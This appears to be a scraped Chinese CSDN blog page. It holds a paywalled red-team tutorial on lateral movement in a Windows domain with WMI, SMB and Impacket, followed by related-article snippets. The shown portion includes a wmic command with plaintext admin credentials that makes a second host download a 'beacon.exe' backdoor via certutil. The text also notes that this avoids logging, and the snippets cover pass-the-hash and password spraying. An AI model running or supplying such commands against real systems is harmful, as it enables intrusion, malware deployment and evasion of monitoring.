6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket_内网横移 代理工具

已于 2024-05-02 01:59:51 修改
阅读量318 收藏 9
点赞数 4
分类专栏: 程序员 文章标签: 安全
于 2024-05-02 01:59:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84263434/article/details/138384543
版权

5、内网安全-域横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动-CSDN博客

1、内网安全-域信息收集&CS插件&Adfind&BloodHound-CSDN博客

一、域横向移动-WMI-自带&命令&套件&插件

WMI
是通过
135
端口进行利用,支持用户名明文或者
hash
的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

1.wmic

内部命令:(利用出网主机192.168.3.31上线后执行命令,密码明文传递通过验证,cmd命令执行)

以下命令在出网主机192.168.3.31上线后执行,无回显:

1、让主机192.168.3.32访问192.168.3.31构造的Web地址,下载后门至C盘
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
2、使得主机192.168.3.32执行后门
wm
最低0.47元/天 解锁文章
2401_84263434
关注
专栏目录
内网渗透(四十三)之横向移动篇-SMB远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 719
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 518
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
m0_65842464的博客
02-16 1628
内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿下内网中更多不出网主机。前提:用户名密码明文或哈希值抓取1、内网安全-域信息收集&CS插件&Adfind&BloodHound-CSDN博客一、域横向移动-WMI-自带命令套件插件WMI是通过135端口进行利用,支持用户名明文或者hash。
第129天:内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
weixin_71529930的博客
08-07 890
这里这个环境继续上一篇文章搭建的环境。
内网安全横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1262
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
内网横向移动Wmi&Smb&CrackMapExec&ProxyChains&Impacket
剁椒鱼头没剁椒的博客
06-30 1196
Windows中的wmi是Windows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。
基于 WMI(Windows Management Instrumentation)的 BIOS 接口设计<固件 C 字营>C
03-02
基于 WMI(Windows Management Instrumentation)的 BIOS 接口设计 <固件 C 字营>Cstyle_x007 WMI 是 Windows 操作系统管理数据和操作的基础设施,系统管理员可以使用 VB Script、PowerShell 及 Windows API(C++、...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&WinRS命令&WinRM管理&RDP终端&密码喷射点&CrackMapExec
HACKONE的博客
06-23 121
如果端口开了,先使用ping 能ping通说明防火墙可能是关的,正向和反向都可以 如果是ping不通就是开的, 开的就要看winrm开没开。下载对应release,建立socks连接,设置socks代理,配置规则,调用!是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。不加 --local-auth执行都是失败的 会访问域并且执行名利。主要参数:-u用户,-p密码,-H哈希值,-d指定域,-x执行命令。主要功能:多协议探针,字典设置,本地及域喷射,命令回显执行等。
内网安全横向传递攻击(SMB || WMI 明文或 hash 传递)
网络安全领域___专研者.
06-09 3062
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2381
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理
内网渗透(四十二)之横向移动篇-WMIC远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 534
WMI是Windows在Powershell还未发布前,微软用来管理Windows系统的重要数据库工具WMI本身的组织架构是一个数据库架构,WMI 服务使用 DCOM或 WinRM 协议,自从 PsExec内网中被严格监控后,越来越多的反病毒厂商将 PsExec 加入了黑名单,于是黑客们渐渐开始使用 WMI 进行横向移动。通过渗透测试发现,在使用 wmiexec 进行横向移动时,windows 操作系统默认不会将 WMI 的操作记录在日志中。因此很多APT开始使用WMI进行攻击。
内网安全-横向移动】基于SMB协议-PsExec
02-10 8984
横向移动-基于SMB协议】PsExec
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1215
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递(pth,ptk等进行移动)2.利用其他服务协议(SMBWMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第三方工具(hashcat)进行破解获取。
内网安全WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 2465
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
内网渗透—横向移动&IPC横移&Impacket套件&CS插件
2301_76227305的博客
07-31 897
以上便是IPC横移的知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
内网横向移动常用方法
最新发布
qq_55894976的博客
08-23 909
使用ms14-068生成新的票据。1.建立了ipc连接。
内网渗透测试理论学习之第四篇内网渗透域的横向移动
千寻的博客
03-01 2314
一、IPC 二、HashDump 三、PTH 四、PTT 五、PsExec 六、WMI 七、DCOM 八、SPN 九、Exchange
内网安全-常见横向移动总结
weixin_45701675的博客
04-25 5765
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
域渗透技术探讨:PassTheHash与PassTheKey解析
PTK使得攻击者可以更隐蔽地在系统间移动,因为使用密钥通常比使用哈希更难以检测。 0x05 技术发展与防御 微软对PTH的防御措施从最初的指导到补丁发布,再到改进的凭证管理策略,反映了防御策略的演变。然而,如同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值